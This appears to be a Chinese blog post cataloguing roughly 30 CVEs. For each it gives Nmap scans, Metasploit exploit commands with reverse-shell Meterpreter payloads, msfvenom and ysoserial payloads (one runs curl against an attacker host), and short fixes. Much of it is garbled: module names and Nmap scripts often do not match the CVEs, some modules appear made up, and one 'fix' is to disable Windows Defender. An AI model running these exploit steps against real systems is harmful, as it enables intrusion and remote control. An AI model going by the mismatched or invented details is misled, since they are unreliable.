msf提权漏洞利用最全总结
mhr18 2025-01-14 15:31 22 浏览 0 评论
最近在重构安全体系,顺带对msf可以利用的漏洞进行了一些总结,喜欢我的朋友请关注并收藏。
2.2.2.1CVE-2019-19781 Citrix漏洞
(1)漏洞检测或者扫描方法:
使用Nmap或Metasploit的citrix_enum模块进行扫描。
# 使用Nmap扫描
nmap -p 80,443 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/citrix_enum
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的citrix_adc_cve_2019_19781模块进行利用。
use exploit/linux/http/citrix_adc_cve_2019_19781
set RPORT 443
set TARGETURI /vpn/
set USERNAME <username>
set PASSWORD <password>
(3)详细的修复办法:
下载v11.1、v12.0以及v13.0版本的Citrix ADC和Gateway软件更新,或禁用易受攻击的目录遍历服务URL路径。
2.2.2.2CVE-2019-11510 Pulse Secure VPN漏洞
(1)使用Nmap扫描目标主机开放的443端口,也可以使用Metasploit的http_pulsesecure_traversal模块进行扫描。
nmap --script ssl-heartbleed -p 443 <target_IP>
use auxiliary/scanner/http/pulsesecure_traversal
(2)使用Metasploit的pulsesecure_cmd_exec模块进行利用。
use exploit/linux/http/pulsesecure_cmd_exec
set SSL true
set TARGETURI /dana-na/../vpns/portal/scripts/newbm.pl
(3)漏洞修复
使用Pulse Secure发布的最新软件更新修补此漏洞,还需同时修改密码和密钥,以增强安全性。
2.2.2.3CVE-2020-5902 F5 BIG-IP漏洞
(1)使用Nmap扫描目标主机开放的443端口,也可以使用Metasploit的http_f5_bigip_check模块进行扫描。
# 使用Nmap扫描
nmap -p 443 --script http-vuln-cve2020-5902 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/http_f5_bigip_check
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的f5_bigip_tmsh_rce模块进行利用。
use exploit/unix/http/f5_bigip_tmsh_rce
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /tmsh/tmshCmd.jsp
run
(3)详细的修复办法:
立即升级到最新版本的BIG-IP软件,最新版本中包含了对此漏洞的修补。
2.2.2.4CVE-2021-21972 VMware vSphere Client漏洞
使用Nmap扫描目标主机,检查TCP 443端口是否开放。也可以使用Metasploit的vmware_vcenter_login模块进行扫描。
# 使用Nmap扫描
nmap -p 443 --script http-vuln-cve2021-22986 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/f5_bigip_cookie
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的f5_bigip_restapi_rce模块进行利用。
use exploit/linux/http/f5_bigip_restapi_rce
set RHOSTS <target_IP>
set TARGETURI /mgmt/tm/util/bash
set PASSWORD <password>
set USERNAME <username>
run
(3)详细的修复办法:
立即升级F5 BIG-IP软件的最新版本,另外,管理员还要加强密码策略和网络安全设置。
2.2.2.5CVE-2021-26855 Exchange漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机,检查TCP 443端口是否开放。也可以使用Metasploit的http_enum模块进行扫描。
# 使用Nmap扫描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/http_enum
set RHOSTS <target_IP>
set RPORT 443
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的microsoft_exchange_server_proxylogon模块进行利用。
use exploit/windows/http/microsoft_exchange_server_proxylogon
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
(3)详细的修复办法:
立即升级Exchange软件的最新版本,或使用Microsoft发布的补丁来修复此漏洞。
2.2.2.6CVE-2020-1472 ZeroLogon漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机开放的SMB服务端口,如果开放了445或139端口,则可能存在此漏洞。也可以使用Metasploit中的smb_version模块进行扫描。
# 使用Nmap扫描
nmap -p 445,139 --script smb-vuln-ms17-010 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/smb/smb_version
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的cve_2020_1472_zerologon模块进行利用。
use exploit/windows/smb/cve_2020_1472_zerologon
set RHOSTS <target_IP>
set SMBDomain <domain_name>
set SMBUser <username>
set SMBPass <password>
run
(3)详细的修复办法:
使用Microsoft发布的补丁修复此漏洞,或者将DCs升级到最新版本。
2.2.2.7CVE-2021-34527 PrintNightmare漏洞
(1)漏洞检测或者扫描方法:
使用PowerShell脚本进行检测:
Get-SmbShare | ForEach-Object { Get-Acl $_.Name | ForEach-Object { $_.Access } } | Where-Object IdentityReference -match 'Everyone|BUILTIN\\Users' | Select-Object FileSystemRights, IdentityReference, AccessControlType, IsInherited | Format-List
使用Microsoft提供的补丁测试工具进行漏洞检测:
# Windows Server 2019/Windows 10 Version 1809 or later
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll
# Windows Server 2012/Windows 8 through earlier versions
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll -VerifySignature 0
(2)漏洞详细利用方法及步骤参考:
使用PowerShell脚本进行利用:
$code = @'
using System;
using System.Runtime.InteropServices;
public class HelloWorld {
public static void Main() {
string cmd = "calc.exe";
NativeMethods.WinExec(cmd, 0);
}
}
internal static class NativeMethods {
[DllImport("kernel32")]
public static extern int WinExec(string cmd, int nCmdShow);
}
'@
Add-Type $code
[HelloWorld]::Main()
使用Metasploit的windows/local/ntprint_smb模块进行利用:
use exploit/windows/local/ntprint_smb
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attack_IP>
set RHOSTS <target_IP>
run
(3)详细的修复办法:
Microsoft已经发布了安全更新程序,建议用户尽快升级到最新版并关闭Windows打印机共享服务。此外,也可以通过策略或命令行的方式禁用Windows打印机共享服务,或者限制用户对打印机共享的访问来减少攻击面。
2.2.2.8 CVE-2021-21985 vSphere Client漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的vmware_vcenter_upload_file模块进行扫描。
# 使用Nmap扫描
nmap -p 443 --script http-vuln-cve2021-21985 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/vmware_vcenter_upload_file
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的vmware_vcenter_server_rce模块进行利用。
use exploit/linux/http/vmware_vcenter_server_rce
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
run
(3)详细的修复办法:
VMware官方发布了vCenter Server 6.7 U3j、7.0 U2c和7.0 Update 2e版本的更新程序来修复此漏洞,管理员可以下载并安装最新版本的软件来修补此漏洞。
2.2.2.9 CVE-2021-31166 IIS漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机的HTTP服务,也可以使用Metasploit的http_iis_webdav_upload_asp模块进行扫描。
# 使用Nmap扫描
nmap -p80 --script http-vuln-cve2021-31166 <target_IP>
# 使用Metasploit模块
use exploit/windows/http/iis_webdav_upload_asp
set RHOSTS <target_IP>
set RPORT 80
set SSL false
set TARGETURI /webdav/test.txt
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的http_iis_webdav_payload模块进行利用。
use exploit/windows/http/iis_webdav_payload
set RHOSTS <target_IP>
set VHOST <host_header>
set LHOST <local_IP>
run
(3)详细的修复办法:
下载并安装最新版本的IIS软件更新来修补此漏洞,或者在服务器上禁用WebDAV协议。
2.2.2.10 CVE-2021-1636 Windows Defender漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否开放了Windows Defender的远程管理端口5985,也可以使用Metasploit的windows/local/ms-windefender-bypass模块进行扫描。
# 使用Nmap扫描
nmap -p 5985 <target_IP>
# 使用Metasploit模块
use exploit/windows/local/ms-windefender-bypass
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的windows/local/ms-windefender-bypass-exe模块进行利用。
use exploit/windows/local/ms-windefender-bypass-exe
set LHOST <local_IP>
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
(3)详细的修复办法:
立即安装微软发布的最新累积更新,或者手动禁用Windows Defender。
2.2.2.11 CVE-2021-22893 Fortinet SSL VPN漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否开放了Fortinet SSL VPN的HTTPS服务,也可以使用Metasploit的http_fortinet_upload_exec模块进行扫描。
# 使用Nmap扫描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/fortinet_upload_exec
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的fortinet_sslvpn_webauth_form_cmd_exec模块进行利用。
use exploit/windows/http/fortinet_sslvpn_webauth_form_cmd_exec
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /remote/login?lang=en
set SSL true
run
(3)详细的修复办法:
将Fortinet SSL VPN升级到最新版本并检查配置是否正确,确保安装了所有推荐的组件和补丁。
CVE-2021-21972 vSphere Client漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21972模块进行扫描。
# 使用Nmap扫描
nmap -p 443 --script http-vuln-cve2021-21972 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21972
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的vmware_vcenter_js_fckeditor模块进行利用。
use exploit/linux/http/vmware_vcenter_js_fckeditor
set RHOSTS <target_IP>
set TARGETURI /fckeditor/editor/filemanager/connectors/test.html
run
(3)详细的修复办法:
立即升级vCenter Server,vSphere Client和ESXi软件,或者使用VMware发布的补丁并重新部署系统。
2.2.2.12 CVE-2021-21979 vCenter Server漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21979模块进行扫描。
# 使用Nmap扫描
nmap -p 443 --script http-vuln-cve2021-21979 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21979
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的vmware_vcenter_server_appliance_rce模块进行利用。
use exploit/linux/http/vmware_vcenter_server_appliance_rce
set RHOSTS <target_IP>
set TARGETURI /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil.getDiagnosticFileContents=1?path=/var/log/vmware/vsan-health/*
run
(3)详细的修复办法:
下载并安装VMware发布的最新版本的软件更新,或者使用VMware发布的补丁修复此漏洞。
2.2.2.13 CVE-2021-22879 SonicWall VPN漏洞
1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否开放了SonicWall VPN的HTTP端口,也可以使用Metasploit的http_sonicwall_sslvpntest模块进行扫描。
# 使用Nmap扫描
nmap -p 443,8443 --script http-vuln-cve2021-20016 <target_IP>
# 使用Metasploit模块
use auxiliary/scanner/http/sonicwall_sslvpntest
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run
2)漏洞详细利用方法及步骤参考:
使用Metasploit的sonicwall_netextender_rce模块进行利用。
use exploit/linux/http/sonicwall_netextender_rce
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run
3)详细的修复办法:
下载并安装最新版本的SonicWall NetExtender客户端,或者升级到最新版本的SonicWall SMA和Firewall软件。
2.2.2.14 CVE-2017-0144 EternalBlue漏洞
(1)漏洞检测或者扫描方法:
使用Nmap进行端口扫描,或使用Metasploit的ms17_010_eternalblue模块进行扫描。
使用Nmap扫描
nmap -sV --script smb-vuln-ms17-010 <target_IP>
使用Metasploit模块
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的windows/shell/reverse_tcp模块进行反向Shell连接。
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST <local_IP>
set LPORT <local_port>
run
(3)详细的修复办法:
立即安装微软发布的最新安全更新或累积更新,或禁用不必要的SMBv1协议。
2.2.2.15 CVE-2019-18935 Citrix ADC漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否存在Citrix ADC,或使用Citrix提供的cxcheck.c脚本进行单个主机扫描。
使用Nmap扫描
nmap -p 80,443 <target_IP>
使用cxcheck.c脚本进行单个主机扫描
gcc cxcheck.c -lpthread -o cxcheck
./cxcheck <target_IP>
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的citrix_adc_cve_2019_19781_directory_traversal模块进行利用。
use auxiliary/scanner/http/citrix_adc_cve_2019_19781_directory_traversal
set RHOSTS <target_IP>
set SRVHOST <local_IP>
run
(3)详细的修复办法:
下载并安装Citrix发布的安全更新补丁,或通过网络隔离等措施进行防范。
2.2.2.16CVE-2020-14750 Oracle WebLogic Server漏洞
(1)漏洞检测或者扫描方法:
使用Nmap扫描目标主机是否存在Oracle WebLogic Server,或使用Metasploit的http_weblogic_ssrf_exec模块进行扫描。
使用Nmap扫描
nmap -p 7001,7002 --script=oracle-tns-version <target_IP>
使用Metasploit模块
use exploit/multi/http/weblogic_ssrf
set RHOSTS <target_IP>
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/weblogic_ssrf_advise_poc模块进行利用。
use exploit/multi/http/weblogic_ssrf_advise_poc
set RHOSTS <target_IP>
run
(3)详细的修复办法:
下载并安装Oracle发布的最新安全更新补丁,或通过网络隔离等措施进行防范,如配置WebLogic防火墙、禁用未使用的组件等措施。同时,建议实现强身份验证,并将系统域名与其他软件绑定在一起以保护WebLogic服务器,避免利用URL入侵漏洞。
2.2.2.17 CVE-2020-0796 SMBv3 Ghost漏洞
(1)漏洞检测或者扫描方法:
使用Nmap进行端口扫描,或使用Metasploit的smb2_compression_zero模块进行扫描。
使用Nmap扫描
nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve2020-0796 <target_IP>
使用Metasploit模块
use auxiliary/scanner/smb/smb2_compression_zero
set RHOSTS <target_IP>
set RPORT 445
run
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的windows/smb/smbv3_client_reliable_dialect_leak模块进行利用。
use exploit/windows/smb/smbv3_client_reliable_dialect_leak
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run
(3)详细的修复办法:
尽快安装微软发布的补丁,禁用不必要的SMBv3协议或进行防火墙限制,以及限制网络流量从外部接入。
2.2.2.18 Shiro反序列化漏洞(CVE-2020-13933)
(1)漏洞检测或扫描方法:
使用ysoserial工具生成payload,发送到目标Shiro服务器并观察是否触发了漏洞。
使用ysoserial工具生成payload
java -jar ysoserial.jar CommonsCollections1 "curl yourserver.com/xxx"|base64
发送payload到目标服务器并观察是否触发漏洞
(2)漏洞详细利用方法及步骤参考:
使用msfvenom生成payload,然后使用Metasploit的multi/http/shiro_default_password_exec模块进行利用。
使用msfvenom生成payload
msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -o payload.bin
使用Metasploit的模块进行攻击
use exploit/multi/http/shiro_default_password_exec
set RHOSTS <target_IP>
set TARGETURI /xxx
set PAYLOADFILE payload.bin
run
(3)详细的修复办法:
升级Apache Shiro版本,禁止使用未授权的功能。
2.2.2.19 Struts2-032远程代码执行漏洞(CVE-2016-3087)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn.py -u http://<target_IP>/index.action -c "command"
struts-pwn:https://github.com/mazen160/struts-pwn
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts2_code_exec_showcase模块进行利用。
use exploit/multi/http/struts2_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run
(3)详细的修复办法:
升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据。
2.2.2.20 Struts2-045远程代码执行漏洞(CVE-2017-5638)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -sV --script http-vuln-cve2017-5638 <target_IP>
使用Struts2-Scan脚本
python struts-pwn-CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts2_content_type_ognl模块进行利用。
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run
(3)详细的修复办法:
升级至最新版本的Struts2,限制上传文件类型,加强日志监控。
2.2.2.21 Struts2-053远程代码执行漏洞(CVE-2017-5638)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -sV --script http-vuln-cve2017-5638 <target_IP>
使用Struts2-Scan脚本
python struts-pwn_CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"
Struts2-Scan:https://github.com/lazym0nk3y/Struts2-Scan
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts2_content_type_ognl模块进行利用。
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run
(3)详细的修复办法:
升级至最新版本的Struts2,限制上传文件类型,加强日志监控。
2.2.2.22 Struts2-061远程代码执行漏洞(CVE-2020-17530)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -sV --script http-vuln-cve2020-17530 <target_IP>
使用Struts2-Scan脚本
python3 Struts2_061_scanner.py -u http://<target_IP>/ -c "touch hack.txt"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/linux/http/struts2_namespace_ognl模块进行利用。
use exploit/linux/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run
(3)详细的修复办法:
升级至最新版本的Struts2,加强输入校验和过滤,限制系统命名空间。
2.2.2.23 Struts2-016远程代码执行漏洞(CVE-2013-2251)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn-CVE-2013-2251.py -u http://<target_IP>/index.action -c "command"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts_code_exec_class模块进行利用。
use exploit/multi/http/struts_code_exec_class
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/example/HelloWorld.action
set CMD <command_to_execute>
run
(3)详细的修复办法:
升级至最新版本的Struts2,限制访问权限和用户输入数据,加强异常处理。
2.2.2.24 Struts2-037远程代码执行漏洞(CVE-2016-3081)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts_dmi_exec模块进行利用。
use exploit/multi/http/struts_dmi_exec
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run
(3)详细的修复办法:
升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据。此漏洞也可以通过在web.xml文件中配置一个安全过滤器来修复。
2.2.2.25 Struts2-052远程代码执行漏洞(CVE-2017-9805)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn-CVE-2017-9805.py -u http://<target_IP>/struts2-showcase/index.action -c "command"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts2_rest_xstream模块进行利用。
use exploit/multi/http/struts2_rest_xstream
set RHOSTS <target_IP>
set TARGETURI /struts2-rest-showcase/orders/
run
(3)详细的修复办法:
升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据,限制访问权限。此漏洞也可以通过在web.xml文件中配置一个安全过滤器来修复。
2.2.2.26Struts2-013远程命令执行漏洞(CVE-2013-1966)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn.py -u http://<target_IP>/index.action -c "command"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts_exec_namespace_ognl模块进行利用。
use exploit/multi/http/struts_exec_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run
(3)详细的修复办法:
升级至最新版本的Struts2,限制访问权限和用户输入数据,加强异常处理。同时,建议在web.xml文件中配置一个安全过滤器来缓解此漏洞的影响。
2.2.2.27 Struts2-033远程命令执行漏洞(CVE-2016-3081)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts_code_exec_showcase模块进行利用。
use exploit/multi/http/struts_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run
(3)详细的修复办法:
升级至最新版本的Struts2,加强用户输入数据的过滤和异常处理,限制访问权限。另外,建议在web.xml文件中配置安全过滤器来缓解此漏洞的影响。
2.2.2.28 Struts2-057远程代码执行漏洞(CVE-2018-11776)
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn-CVE-2018-11776.py -u http://<target_IP>/index.action
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts2_namespace_ognl模块进行利用。
use exploit/multi/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run
(3)详细的修复办法:
升级至最新版本的Struts2,加强用户输入数据的过滤和异常处理,限制访问权限。另外,建议在web.xml文件中配置安全过滤器来缓解此漏洞的影响。
2.2.2.29 Struts2-devmode远程代码执行漏洞
(1)漏洞检测或扫描方法:
使用Nmap和Struts2-Scan脚本进行扫描。
使用Nmap扫描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>
使用Struts2-Scan脚本
python struts-pwn-devmode.py -u http://<target_IP>/struts2-showcase/ -c "command"
(2)漏洞详细利用方法及步骤参考:
使用Metasploit的exploit/multi/http/struts2_dev_mode模块进行利用。
use exploit/multi/http/struts2_dev_mode
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run
(3)详细的修复办法:
升级至最新版本的Struts2,加强用户输入数据的过滤和异常处理,限制访问权限。另外,建议关闭devMode或限制只有特定IP地址能够访问。
喜欢的朋友请关注并收藏,另外也可以关注我的公众号《小兵搞安全》。
相关推荐
- 甲骨文签署多项大型云协议,其一未来可贡献超300亿美元年收入
-
IT之家7月1日消息,根据甲骨文Oracle当地时间6月30日向美国证券交易委员会(SEC)递交的FORM8-K文件,该企业在始于2025年6月1日的202...
- 甲骨文获TEMU巨额合同,后者大部分基础设施将迁移至Oracle云
-
IT之家6月23日消息,Oracle甲骨文创始人、董事长兼首席技术官LarryEllison(拉里埃里森)在本月早些时候的2025财年第四财季和全财年财报电话会议上表示,Oracle...
- Spring Boot 自定义数据源设置,这些坑你踩过吗?
-
你在使用SpringBoot进行后端开发的过程中,是不是也遇到过这样的问题:项目上线后,数据库连接总是不稳定,偶尔还会出现数据读取缓慢的情况,严重影响了用户体验。经过排查,发现很大一部分原因竟然...
- 一个开箱即用的代码生成器(一个开箱即用的代码生成器是什么)
-
今天给大家推荐一个好用的代码生成器,名为renren-generator,该项目附带前端页面,可以很方便的选择我们所需要生成代码的表。首先我们通过git工具克隆下来代码(地址见文末),导入idea。...
- 低代码建模平台-数据挖掘平台(低代码平台的实现方式)
-
现在来看一下数据连接。·这里是管理数据连接的空间,点击这里可以新增一个数据连接。·输入连接名称,然后输入url,是通过gdbc的方式去连接的数据库,目前是支持mysql、oracle以及国产数据库达梦...
- navicat 17.2.7连接oracle数据库提示加载oracle库失败
-
系统:macOS15.5navicat版本:navicatpremiumlite17.2.7连接oracle测试报错:加载oracle库失败【解决办法】:放达里面找到程序,显示简介里面勾选“使...
- 开源“Windows”ReactOS更新:支持全屏应用
-
IT之家6月17日消息,ReactOS团队昨日(6月16日)在X平台发布系列推文,公布了该系统的最新进展,包括升级Explorer组件,支持全屏应用,从Wine项目引入了...
- SSL 推出采用全模拟内置混音技术的模拟调音台Oracle
-
英国调音台传奇品牌SolidStateLogic宣布推出Oracle——一款采用全模拟内置混音技术的调音台,在紧凑的AWS尺寸机箱内集成了大型调音台的功能。该调音台提供24输入和...
- 47道网络工程师常见面试题,看看有没有你不会的!
-
你们好,我的网工朋友。网络工程师面试的时候,都会被问到什么?这个问题其实很泛,一般来说,你肯定要先看明白岗位需求写的是什么。基本上都是围绕公司需要的业务去问的。但不可否认的是,那些最基础的概念,多少也...
- 汉得信息:发布EBS系统安装启用JWS的高效解决方案
-
e公司讯,从汉得信息获悉,近日,微软官方宣布InternetExplorer桌面应用程序将于2022年6月15日正式停用。目前大部分客户都是使用IE浏览器打开EBS的Form界面,IE停用后,只能使...
- 36.9K star ! 推荐一个酷炫低代码开发平台!功能太强!
-
前言最近在逛github,看看能不能搜罗到一些对自己有帮助的开源软件。不经意间看到一个高star的java开源项目:jeecg-boot。进入在线演示版一看,感叹实在是太牛了!此开源项目不管是给来学习...
- Linux新手入门系列:Linux下jdk安装配置
-
本系列文章是把作者刚接触和学习Linux时候的实操记录分享出来,内容主要包括Linux入门的一些理论概念知识、Web程序、mysql数据库的简单安装部署,希望能够帮到一些初学者,少走一些弯路。注意:L...
- 手把手教你在嵌入式设备中使用SQLite3
-
摘要:数据库是用来存储和管理数据的专用软件,使得管理数据更加安全,方便和高效。数据库对数据的管理的基本单位是表(table),在嵌入式linux中有时候它也需要用到数据库,听起来好难,其实就是几个函数...
- JAVA语言基础(java语言基础知识)
-
一、计算机的基本概念什么是计算机?计算机(Computer)全称:电子计算机,俗称电脑。是一种能够按照程序运行、自动高速处理海量数据的现代化智能电子设备。由硬件和软件组成、没有安装过任何软件的计算机称...
- 再见 Navicat!一款开源的 Web 数据库管理工具!
-
大家好,我是Java陈序员。在日常的开发工作中,常常需要与各种数据库打交道。而为了提高工作效率,常常会使用一些可视化工具进行操作数据库。今天,给大家介绍一款开源的数据库管理工具,无需下载安装软件,基...
你 发表评论:
欢迎- 一周热门
- 最近发表
-
- 甲骨文签署多项大型云协议,其一未来可贡献超300亿美元年收入
- 甲骨文获TEMU巨额合同,后者大部分基础设施将迁移至Oracle云
- Spring Boot 自定义数据源设置,这些坑你踩过吗?
- 一个开箱即用的代码生成器(一个开箱即用的代码生成器是什么)
- 低代码建模平台-数据挖掘平台(低代码平台的实现方式)
- navicat 17.2.7连接oracle数据库提示加载oracle库失败
- 开源“Windows”ReactOS更新:支持全屏应用
- SSL 推出采用全模拟内置混音技术的模拟调音台Oracle
- 47道网络工程师常见面试题,看看有没有你不会的!
- 汉得信息:发布EBS系统安装启用JWS的高效解决方案
- 标签列表
-
- oracle位图索引 (74)
- oracle批量插入数据 (65)
- oracle事务隔离级别 (59)
- oracle 空为0 (51)
- oracle主从同步 (55)
- oracle 乐观锁 (51)
- redis 命令 (78)
- php redis (88)
- redis 存储 (66)
- redis 锁 (69)
- 启动 redis (66)
- redis 时间 (56)
- redis 删除 (67)
- redis内存 (57)
- redis并发 (52)
- redis 主从 (69)
- redis 订阅 (51)
- redis 登录 (54)
- redis 面试 (58)
- 阿里 redis (59)
- redis 搭建 (53)
- redis的缓存 (55)
- lua redis (58)
- redis 连接池 (61)
- redis 限流 (51)